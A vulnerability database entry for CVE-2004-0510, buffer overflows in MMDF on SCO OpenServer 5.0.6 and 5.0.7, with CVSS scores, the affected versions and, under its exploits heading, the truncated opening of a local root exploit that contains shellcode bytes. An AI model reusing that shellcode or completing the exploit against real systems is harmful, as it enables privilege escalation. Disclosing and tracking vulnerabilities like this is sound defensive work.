7.2
CVSSv2

CVE-2004-0510

Published: 23/12/2004 Updated: 14/02/2024
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Multiple buffer overflows in MMDF on OpenServer 5.0.6 and 5.0.7, and possibly other operating systems, may allow malicious users to execute arbitrary code, as demonstrated via the execmail program.

Vulnerable Product Search on Vulmon Subscribe to Product

sco openserver 5.0.7

sco openserver 5.0.6a

sco openserver 5.0.6

Exploits

/* * MMDF deliver local root exploit for SCO OpenServer 507 x86 * Copyright 2004 Ramon de Carvalho Valle * */ char shellcode[]= /* 36 bytes */ "\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */ "\x6a\x65" /* pushl $0x65 */ "\x89\xe6" ...